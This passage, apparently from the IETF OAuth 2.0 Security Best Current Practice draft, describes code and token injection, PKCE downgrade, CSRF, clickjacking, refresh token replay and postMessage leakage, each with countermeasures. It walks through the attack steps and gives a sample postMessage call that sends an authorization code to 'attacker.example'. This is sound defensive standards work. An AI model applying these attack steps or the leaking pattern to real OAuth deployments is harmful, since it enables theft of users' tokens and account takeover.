injection attack. Instead, an attacker can directly call the token endpoint with
the stolen authorization code.¶
Other solutions, like binding state
to the code, sender-constraining the code
using cryptographic means, or per-instance client credentials are
conceivable, but lack support and bring new security requirements.¶
PKCE is the most obvious solution for OAuth clients as it is available
today, while nonce
is
appropriate for OpenID Connect clients.¶
An attacker can circumvent the countermeasures described above if he
can modify the nonce
or code_challenge
values that are used in the
victim's authorization request. The attacker can modify these values
to be the same ones as those chosen by the client in their own session
in Step 2 of the attack above. (This requires that the victim's
session with the client begins after the attacker started their session
with the client.) If the attacker is then able to capture the
authorization code from the victim, the attacker will be able to
inject the stolen code in Step 3 even if PKCE or nonce
are used.¶
This attack is complex and requires a close interaction between the attacker and the victim's session. Nonetheless, measures to prevent attackers from reading the contents of the authorization response still need to be taken, as described in Section 4.1, Section 4.2, Section 4.3, Section 4.4, and Section 4.11.¶
In an access token injection attack, the attacker attempts to inject a stolen access token into a legitimate client (that is not under the attacker's control). This will typically happen if the attacker wants to utilize a leaked access token to impersonate a user in a certain client.¶
To conduct the attack, the attacker starts an OAuth flow with the
client using the implicit grant and modifies the authorization
response by replacing the access token issued by the authorization
server or directly making up an authorization server response including
the leaked access token. Since the response includes the state
value
generated by the client for this particular transaction, the client
does not treat the response as a CSRF attack and uses the access token
injected by the attacker.¶
There is no way to detect such an injection attack in pure-OAuth flows since the token is issued without any binding to the transaction or the particular user agent.¶
In OpenID Connect, the attack can be mitigated, as the authorization response
additionally contains an ID Token containing the at_hash
claim. The attacker
therefore needs to replace both the access token as well as the ID Token in the
response. The attacker cannot forge the ID Token, as it is signed or encrypted
with authentication. The attacker also cannot inject a leaked ID Token matching
the stolen access token, as the nonce
claim in the leaked ID Token will
(with a very high probability) contain a different value than the one expected
in the authorization response.¶
Note that further protection, like sender-constrained access tokens, is still required to prevent attackers from using the access token at the resource endpoint directly.¶
The recommendations in Section 2.1.2 follow from this.¶
An attacker might attempt to inject a request to the redirect URI of the legitimate client on the victim's device, e.g., to cause the client to access resources under the attacker's control. This is a variant of an attack known as Cross-Site Request Forgery (CSRF).¶
The long-established countermeasure is that clients pass a random value, also
known as a CSRF Token, in the state
parameter that links the request to
the redirect URI to the user agent session as described. This
countermeasure is described in detail in [RFC6819], Section 5.3.5. The
same protection is provided by PKCE or the OpenID Connect nonce
value.¶
When using PKCE instead of state
or nonce
for CSRF protection, it is
important to note that:¶
Clients MUST ensure that the authorization server supports PKCE before using PKCE for
CSRF protection. If an authorization server does not support PKCE,
state
or nonce
MUST be used for CSRF protection.¶
If state
is used for carrying application state, and the integrity of
its contents is a concern, clients MUST protect state
against
tampering and swapping. This can be achieved by binding the
contents of state to the browser session and/or signed/encrypted
state values. One example of this is discussed in the now-expired draft [I-D.bradley-oauth-jwt-encoded-state].¶
The authorization server therefore MUST provide a way to detect their support for PKCE. Using Authorization Server Metadata according to [RFC8414] is RECOMMENDED, but authorization servers MAY instead provide a deployment-specific way to ensure or determine PKCE support.¶
PKCE provides robust protection against CSRF attacks even in presence of an attacker that
can read the authorization response (see Attacker A3 in Section 3). When
state
is used or an ID Token is returned in the authorization response (e.g.,
response_type=code+id_token
), the attacker either learns the state
value and
can replay it into the forged authorization response, or can extract the nonce
from the ID Token and use it in a new request to the authorization server to
mint an ID Token with the same nonce
. The new ID Token can then be used for
the CSRF attack.¶
An authorization server that supports PKCE but does not make its use mandatory for all flows can be susceptible to a PKCE downgrade attack.¶
The first prerequisite for this attack is that there is an attacker-controllable
flag in the authorization request that enables or disables PKCE for the
particular flow. The presence or absence of the code_challenge
parameter lends
itself for this purpose, i.e., the authorization server enables and enforces PKCE if this
parameter is present in the authorization request, but does not enforce PKCE if
the parameter is missing.¶
The second prerequisite for this attack is that the client is not using state
at all (e.g., because the client relies on PKCE for CSRF prevention) or that the
client is not checking state
correctly.¶
Roughly speaking, this attack is a variant of a CSRF attack. The attacker achieves the same goal as in the attack described in Section 4.7: The attacker injects an authorization code (and with that, an access token) that is bound to the attacker's resources into a session between their victim and the client.¶
code_challenge=hash(abc)
as the PKCE code challenge (with the hash function and parameter encoding as defined in [RFC7636]). The client is now
waiting to receive the authorization response from the user's browser.¶
code_challenge=hash(xyz)
, in the authorization
request. The attacker intercepts the request and removes the entire
code_challenge
parameter from the request. Since this step is performed on
the attacker's device, the attacker has full access to the request contents,
for example using browser debug tools.¶
code_verifier=abc
as the PKCE code verifier in the token request.¶
code_verifier
parameter. It will issue an access token that belongs to the
attacker's resource to the client under the user's control.¶
Using state
properly would prevent this attack. However, practice has shown
that many OAuth clients do not use or check state
properly.¶
Therefore, authorization servers MUST mitigate this attack.¶
Note that from the view of the authorization server, in the attack described above, a
code_verifier
parameter is received at the token endpoint although no
code_challenge
parameter was present in the authorization request for the
OAuth flow in which the authorization code was issued.¶
This fact can be used to mitigate this attack. [RFC7636] already mandates that¶
code_challenge
in the authorization request for which this code was issued, there must be a
valid code_verifier
in the token request.¶
Beyond this, to prevent PKCE downgrade attacks, the authorization server MUST ensure that
if there was no code_challenge
in the authorization request, a request to
the token endpoint containing a code_verifier
is rejected.¶
Authorization servers that mandate the use of PKCE in general or for particular clients implicitly implement this security measure.¶
Access tokens can leak from a resource server under certain circumstances.¶
An attacker may set up their own resource server and trick a client into sending access tokens to it that are valid for other resource servers (see Attackers A1 and A5 in Section 3). If the client sends a valid access token to this counterfeit resource server, the attacker in turn may use that token to access other services on behalf of the resource owner.¶
This attack assumes the client is not bound to one specific resource server (and its URL) at development time, but client instances are provided with the resource server URL at runtime. This kind of late binding is typical in situations where the client uses a service implementing a standardized API (e.g., for e-mail, calendar, health, or banking) and where the client is configured by a user or administrator for a service that this user or company uses.¶
An attacker may compromise a resource server to gain access to the resources of the respective deployment. Such a compromise may range from partial access to the system, e.g., its log files, to full control over the respective server, in which case all controls can be circumvented and all resources can be accessed. The attacker would also be able to obtain other access tokens held on the compromised system that would potentially be valid to access other resource servers.¶
Preventing server breaches by hardening and monitoring server systems is considered a standard operational procedure and, therefore, out of the scope of this document. This section focuses on the impact of OAuth-related breaches and the replaying of captured access tokens.¶
The following measures should be taken into account by implementers in order to cope with access token replay by malicious actors:¶
The first and second recommendations also apply to other scenarios where access tokens leak (see Attacker A5 in Section 3).¶
Access tokens can be stolen by an attacker in various ways, for example, via the attacks described in Section 4.1, Section 4.2, Section 4.3, Section 4.4 and Section 4.9. Some of these attacks can be mitigated by specific security measures, as described in the respective sections. However, in some cases, these measures are not sufficient or are not implemented correctly. Authorization servers therefore SHOULD ensure that access tokens are sender-constrained and audience-restricted as described in the following. Architecture and performance reasons may prevent the use of these measures in some deployments.¶
As the name suggests, sender-constrained access tokens scope the applicability of an access token to a certain sender. This sender is obliged to demonstrate knowledge of a certain secret as a prerequisite for the acceptance of that token at a resource server.¶
A typical flow looks like this:¶
Two methods for sender-constrained access tokens using proof-of-possession have been defined by the OAuth working group and are in use in practice:¶
Note that the security of sender-constrained tokens is undermined when an attacker gets access to the token and the key material. This is, in particular, the case for corrupted client software and cross-site scripting attacks (when the client is running in the browser). If the key material is protected in a hardware or software security module or only indirectly accessible (like in a TLS stack), sender-constrained tokens at least protect against the use of the token when the client is offline, i.e., when the security module or interface is not available to the attacker. This applies to access tokens as well as to refresh tokens (see Section 4.14).¶
Audience restriction essentially restricts access tokens to a particular resource server. The authorization server associates the access token with the particular resource server and the resource server is then supposed to verify the intended audience. If the access token fails the intended audience validation, the resource server refuses to serve the respective request.¶
In general, audience restriction limits the impact of token leakage. In the case of a counterfeit resource server, it may (as described below) also prevent abuse of the phished access token at the legitimate resource server.¶
The audience can be expressed using logical names or physical addresses (like URLs). To prevent phishing, it is necessary to use the actual URL the client will send requests to. In the phishing case, this URL will point to the counterfeit resource server. If the attacker tries to use the access token at the legitimate resource server (which has a different URL), the resource server will detect the mismatch (wrong audience) and refuse to serve the request.¶
In deployments where the authorization server knows the URLs of all resource servers, the authorization server may just refuse to issue access tokens for unknown resource server URLs.¶
For this to work, the client needs to tell the authorization server the intended resource server. The mechanism in [RFC8707] can be used for this or the information can be encoded in the scope value (Section 3.3 of [RFC6749]).¶
Instead of the URL, it is also possible to utilize the fingerprint of the resource server's X.509 certificate as the audience value. This variant would also allow detection of an attempt to spoof the legitimate resource server's URL by using a valid TLS certificate obtained from a different CA. It might also be considered a privacy benefit to hide the resource server URL from the authorization server.¶
Audience restriction may seem easier to use since it does not require any cryptography on the client side. Still, since every access token is bound to a specific resource server, the client also needs to obtain a single resource server-specific access token when accessing several resource servers. (Resource indicators, as specified in [RFC8707], can help to achieve this.) [I-D.ietf-oauth-token-binding] had the same property since different token-binding IDs must be associated with the access token. Using [RFC8705], on the other hand, allows a client to use the access token at multiple resource servers.¶
It should be noted that audience restrictions, or generally speaking an indication by the client to the authorization server where it wants to use the access token, have additional benefits beyond the scope of token leakage prevention. It allows the authorization server to create a different access token whose format and content are specifically minted for the respective server. This has huge functional and privacy advantages in deployments using structured access tokens.¶
An authorization server could provide the client with additional information about the locations where it is safe to use its access tokens. This approach, and why it is not recommended, is discussed in the following.¶
In the simplest form, this would require the authorization server to publish a list of
its known resource servers, illustrated in the following example using
a non-standard Authorization Server Metadata parameter resource_servers
:¶
HTTP/1.1 200 OK Content-Type: application/json { "issuer":"https://server.somesite.example", "authorization_endpoint": "https://server.somesite.example/authorize", "resource_servers":[ "email.somesite.example", "storage.somesite.example", "video.somesite.example" ] ... }¶
The authorization server could also return the URL(s) an access token is good for in the
token response, illustrated by the example and non-standard return
parameter access_token_resource_server
:¶
HTTP/1.1 200 OK Content-Type: application/json;charset=UTF-8 Cache-Control: no-store Pragma: no-cache { "access_token":"2YotnFZFEjr1zCsicMWpAA", "access_token_resource_server": "https://hostedresource.somesite.example/path1", ... }¶
This mitigation strategy would rely on the client to enforce the
security policy and to only send access tokens to legitimate
destinations. Results of OAuth-related security research (see for
example [research.ubc] and [research.cmu]) indicate a
large portion of client implementations do not or fail to properly
implement security controls, like state
checks. So relying on
clients to prevent access token phishing is likely to fail as well.
Moreover, given the ratio of clients to authorization and resource
servers, it is considered the more viable approach to move as much as
possible security-related logic to those entities. Clearly, the client
has to contribute to the overall security. However, there are alternative
countermeasures, as described before, that provide a
better balance between the involved parties.¶
The following attacks can occur when an authorization server or client has an open redirector. Such endpoints are sometimes implemented, for example, to show a message before a user is then redirected to an external website, or to redirect users back to a URL they were intending to visit before being interrupted, e.g., by a login prompt.¶
Clients MUST NOT expose open redirectors. Attackers may use open redirectors to produce URLs pointing to the client and utilize them to exfiltrate authorization codes and access tokens, as described in Section 4.1.2. Another abuse case is to produce URLs that appear to point to the client. This might trick users into trusting the URL and following it in their browser. This can be abused for phishing.¶
In order to prevent open redirection, clients should only redirect if the target URLs are allowed or if the origin and integrity of a request can be authenticated. Countermeasures against open redirection are described by OWASP [owasp.redir].¶
At the authorization endpoint, a typical protocol flow is that the authorization server prompts the user to enter their credentials in a form that is then submitted (using the HTTP POST method) back to the authorization server. The authorization server checks the credentials and, if successful, redirects the user agent to the client's redirection endpoint.¶
In [RFC6749], the HTTP status code 302 is used for this purpose, but "any other method available via the user-agent to accomplish this redirection is allowed". When the status code 307 is used for redirection instead, the user agent will send the user's credentials via HTTP POST to the client.¶
This discloses the sensitive credentials to the client. If the client is malicious, it can use the credentials to impersonate the user at the authorization server.¶
The behavior might be unexpected for developers but is defined in [RFC9110], Section 15.4.8. This status code does not require the user agent to rewrite the POST request to a GET request and thereby drop the form data in the POST request body.¶
In the HTTP standard [RFC9110], only the status code 303 unambiguously enforces rewriting the HTTP POST request to an HTTP GET request. For all other status codes, including the popular 302, user agents can opt not to rewrite POST to GET requests and therefore to reveal the user's credentials to the client. (In practice, however, most user agents will only show this behaviour for 307 redirects.)¶
Authorization servers that redirect a request that potentially contains the user's credentials therefore MUST NOT use the HTTP 307 status code for redirection. If an HTTP redirection (and not, for example, JavaScript) is used for such a request, the authorization server SHOULD use HTTP status code 303 (See Other).¶
A common deployment architecture for HTTP applications is to hide the application server behind a reverse proxy that terminates the TLS connection and dispatches the incoming requests to the respective application server nodes.¶
This section highlights some attack angles of this deployment architecture with relevance to OAuth and gives recommendations for security controls.¶
In some situations, the reverse proxy needs to pass security-related data to the upstream application servers for further processing. Examples include the IP address of the request originator, token-binding IDs, and authenticated TLS client certificates. This data is usually passed in HTTP headers added to the upstream request. While the headers are often custom, application-specific headers, standardized header fields for client certificates and client certificate chains are defined in [RFC9440].¶
If the reverse proxy passes through any header sent from the
outside, an attacker could try to directly send the faked header
values through the proxy to the application server in order to
circumvent security controls that way. For example, it is standard
practice of reverse proxies to accept X-Forwarded-For
headers and just
add the origin of the inbound request (making it a list). Depending on
the logic performed in the application server, the attacker could
simply add an allowed IP address to the header and render the protection useless.¶
A reverse proxy MUST therefore sanitize any inbound requests to ensure the authenticity and integrity of all header values relevant for the security of the application servers.¶
If an attacker were able to get access to the internal network between the proxy and application server, the attacker could also try to circumvent security controls in place. It is, therefore, essential to ensure the authenticity of the communicating entities. Furthermore, the communication link between the reverse proxy and application server MUST be protected against eavesdropping, injection, and replay of messages.¶
Refresh tokens are a convenient and user-friendly way to obtain new access tokens. They also add to the security of OAuth, since they allow the authorization server to issue access tokens with a short lifetime and reduced scope, thus reducing the potential impact of access token leakage.¶
Refresh tokens are an attractive target for attackers since they represent the full scope of grant a resource owner delegated to a certain client and they are not further constrained to a specific resource. If an attacker is able to exfiltrate and successfully replay a refresh token, the attacker will be able to mint access tokens and use them to access resource servers on behalf of the resource owner.¶
[RFC6749] already provides robust baseline protection by requiring¶
[RFC6749] also lays the foundation for further (implementation-specific) security measures, such as refresh token expiration and revocation as well as refresh token rotation by defining respective error codes and response behaviors.¶
This specification gives recommendations beyond the scope of [RFC6749] and clarifications.¶
Authorization servers MUST determine, based on a risk assessment, whether to issue refresh tokens to a certain client. If the authorization server decides not to issue refresh tokens, the client MAY obtain a new access token by utilizing other grant types, such as the authorization code grant type. In such a case, the authorization server may utilize cookies and persistent grants to optimize the user experience.¶
If refresh tokens are issued, those refresh tokens MUST be bound to the scope and resource servers as consented by the resource owner. This is to prevent privilege escalation by the legitimate client and reduce the impact of refresh token leakage.¶
For confidential clients, [RFC6749] already requires that refresh tokens can only be used by the client for which they were issued.¶
Authorization servers MUST utilize one of these methods to detect refresh token replay by malicious actors for public clients:¶
Refresh token rotation: the authorization server issues a new refresh token with every access token refresh response. The previous refresh token is invalidated but information about the relationship is retained by the authorization server. If a refresh token is compromised and subsequently used by both the attacker and the legitimate client, one of them will present an invalidated refresh token, which will inform the authorization server of the breach. The authorization server cannot determine which party submitted the invalid refresh token, but it will revoke the active refresh token. This stops the attack at the cost of forcing the legitimate client to obtain a fresh authorization grant.¶
Implementation note: The grant to which a refresh token belongs may be encoded into the refresh token itself. This can enable an authorization server to efficiently determine the grant to which a refresh token belongs, and by extension, all refresh tokens that need to be revoked. Authorization servers MUST ensure the integrity of the refresh token value in this case, for example, using signatures.¶
Authorization servers MAY revoke refresh tokens automatically in case of a security event, such as:¶
Refresh tokens SHOULD expire if the client has been inactive for some time, i.e., the refresh token has not been used to obtain fresh access tokens for some time. The expiration time is at the discretion of the authorization server. It might be a global value or determined based on the client policy or the grant associated with the refresh token (and its sensitivity).¶
Resource servers may make access control decisions based on the identity of a
resource owner for which an access token was issued, or based on the identity of
a client in the client credentials grant. For example, [RFC9068] (JSON Web
Token (JWT) Profile for OAuth 2.0 Access Tokens) describes a data structure for
access tokens containing a sub
claim defined as follows:¶
In cases of access tokens obtained through grants where a resource owner is involved, such as the authorization code grant, the value of
sub
SHOULD correspond to the subject identifier of the resource owner. In cases of access tokens obtained through grants where no resource owner is involved, such as the client credentials grant, the value ofsub
SHOULD correspond to an identifier the authorization server uses to indicate the client application.¶
If both options are possible, a resource server may mistake a client's identity
for the identity of a resource owner. For example, if a client is able to choose
its own client_id
during registration with the authorization server, a
malicious client may set it to a value identifying a resource owner (e.g., a
sub
value if OpenID Connect is used). If the resource server cannot properly
distinguish between access tokens obtained with involvement of the resource
owner and those without, the client may accidentally be able to access resources
belonging to the resource owner.¶
This attack potentially affects not only implementations using [RFC9068], but also similar, bespoke solutions.¶
Authorization servers SHOULD NOT allow clients to influence their client_id
or
any claim that could cause confusion with a genuine resource owner if a common
namespace for client IDs and user identifiers exists, such as in the sub
claim
shown above. Where this cannot be avoided, authorization servers MUST provide
other means for the resource server to distinguish between the two types of
access tokens.¶
As described in Section 4.4.1.9 of [RFC6819], the authorization request is susceptible to clickjacking attacks, also called user interface redressing. In such an attack, an attacker embeds the authorization endpoint user interface in an innocuous context. A user believing to interact with that context, for example, by clicking on buttons, inadvertently interacts with the authorization endpoint user interface instead. The opposite can be achieved as well: A user believing to interact with the authorization endpoint might inadvertently type a password into an attacker-provided input field overlaid over the original user interface. Clickjacking attacks can be designed such that users can hardly notice the attack, for example using almost invisible iframes overlaid on top of other elements.¶
An attacker can use this vector to obtain the user's authentication credentials, change the scope of access granted to the client, and potentially access the user's resources.¶
Authorization servers MUST prevent clickjacking attacks. Multiple countermeasures are described in [RFC6819], including the use of the X-Frame-Options HTTP response header field and frame-busting JavaScript. In addition to those, authorization servers SHOULD also use Content Security Policy (CSP) level 2 [W3C.CSP-2] or greater.¶
To be effective, CSP must be used on the authorization endpoint and, if applicable, other endpoints used to authenticate the user and authorize the client (e.g., the device authorization endpoint, login pages, error pages, etc.). This prevents framing by unauthorized origins in user agents that support CSP. The client MAY permit being framed by some other origin than the one used in its redirection endpoint. For this reason, authorization servers SHOULD allow administrators to configure allowed origins for particular clients and/or for clients to register these dynamically.¶
Using CSP allows authorization servers to specify multiple origins in
a single response header field and to constrain these using flexible
patterns (see [W3C.CSP-2] for details). Level 2 of this standard provides
a robust mechanism for protecting against clickjacking by using
policies that restrict the origin of frames (using frame-ancestors
)
together with those that restrict the sources of scripts allowed to
execute on an HTML page (by using script-src
). A non-normative
example of such a policy is shown in the following listing:¶
HTTP/1.1 200 OK Content-Security-Policy: frame-ancestors https://ext.example.org:8000 Content-Security-Policy: script-src 'self' X-Frame-Options: ALLOW-FROM https://ext.example.org:8000 ...¶
Because some user agents do not support [W3C.CSP-2], this technique SHOULD be combined with others, including those described in [RFC6819], unless such legacy user agents are explicitly unsupported by the authorization server. Even in such cases, additional countermeasures SHOULD still be employed.¶
If the authorization response is sent with in-browser communication techniques like postMessage [WHATWG.postmessage_api] instead of HTTP redirects, messages may inadvertently be sent to malicious origins or injected from malicious origins.¶
The following non-normative pseudocode examples of attacks using in-browser communication are described in [research.rub]:¶
When sending the authorization response or token response via postMessage, the authorization server sends the response to the wildcard origin "*" instead of the client's origin. When the window to which the response is sent is controlled by an attacker, the attacker can read the response.¶
window.opener.postMessage( { code: "ABC", state: "123" }, "*" // any website in the opener window can receive the message )¶
When sending the authorization response or token response via postMessage, the authorization server may not check the receiver origin against the redirect URI and instead, for example, send the response to an origin provided by an attacker. This is analogous to the attack described in Section 4.1.¶
window.opener.postMessage( { code: "ABC", state: "123" }, "https://attacker.example" // attacker-provided value )¶
A client that expects the authorization response or token response via postMessage may not validate the sender origin of the message. This may allow an attacker to inject an authorization response or token response into the client.¶
In the case of a maliciously injected authorization response, the attack is a variant of the CSRF attacks described in Section 4.7. The countermeasures described in Section 4.7 apply to this attack as well.¶
In the case of a maliciously injected token response, sender-constrained access tokens as described in Section 4.10.1 may prevent the attack under some circumstances, but additional countermeasures as described next are generally required.¶
When comparing client receiver origins against pre-registered origins, authorization servers MUST utilize exact string matching as described in Section 4.1.3. Authorization servers MUST send postMessages to trusted client receiver origins, as shown in the following, non-normative example:¶
window.opener.postMessage( { code: "ABC", state: "123" }, "https://client.example" // use explicit client origin )¶
Wildcard origins like "*" in postMessage MUST NOT be used as attackers can use them to leak a victim's in-browser message to malicious origins. Both measures contribute to the prevention of leakage of authorization codes and access tokens (see Section 4.1).¶
Clients MUST prevent injection of in-browser messages on the client receiver endpoint. Clients MUST utilize exact string matching to compare the initiator origin of an in-browser message with the authorization server origin, as shown in the following, non-normative example:¶
window.addEventListener("message", (e) => { // validate exact authorization server origin if (e.origin === "https://honest.as.example") { // process e.data.code and e.data.state } })¶
Since in-browser communication flows only apply a different communication technique (i.e., postMessage instead of HTTP redirect), all measures protecting the authorization response listed in Section 2.1 MUST be applied equally.¶
We would like to thank Brock Allen, Annabelle Richard Backman, Dominick Baier, Vittorio Bertocci, Brian Campbell, Bruno Crispo, William Dennis, George Fletcher, Matteo Golinelli, Dick Hardt, Joseph Heenan, Pedram Hosseyni, Phil Hunt, Tommaso Innocenti, Louis Jannett, Jared Jennings, Michael B. Jones, Engin Kirda, Konstantin Lapine, Neil Madden, Christian Mainka, Jim Manico, Nov Matake, Doug McDorman, Ali Mirheidari, Vladislav Mladenov, Karsten Meyer zu Selhausen, Kaan Onarioglu, Aaron Parecki, Michael Peck, Johan Peeters, Nat Sakimura, Guido Schmitz, Jörg Schwenk, Rifaat Shekh-Yusef, Travis Spencer, Petteri Stenius, Tomek Stojecki, Tim Wuertele, David Waite and Hans Zandbelt for their valuable feedback.¶
This draft makes no requests to IANA.¶
Security considerations are described in Section 2, Section 3, and Section 4.¶
[[ To be removed from the final specification ]]¶
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